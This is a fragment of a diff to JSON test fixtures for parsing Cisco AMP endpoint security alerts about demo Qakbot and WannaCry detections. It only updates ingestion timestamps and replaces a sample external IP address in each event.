"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3857,8 +3857,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798756900Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010873400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3878,7 +3878,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3919,7 +3919,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3929,8 +3929,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798759114Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010878900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3950,7 +3950,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4009,7 +4009,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4026,8 +4026,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798761355Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:47.010884200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4049,7 +4049,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -4094,7 +4094,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4104,8 +4104,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798763596Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010889500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -4125,7 +4125,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4166,7 +4166,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4176,8 +4176,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798765999Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010892700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4197,7 +4197,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4242,7 +4242,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4252,8 +4252,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798768257Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010896900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4273,7 +4273,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4323,7 +4323,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4340,8 +4340,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798770474Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010901900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4363,7 +4363,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4409,7 +4409,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4426,8 +4426,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798772697Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010906400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4449,7 +4449,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4495,7 +4495,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
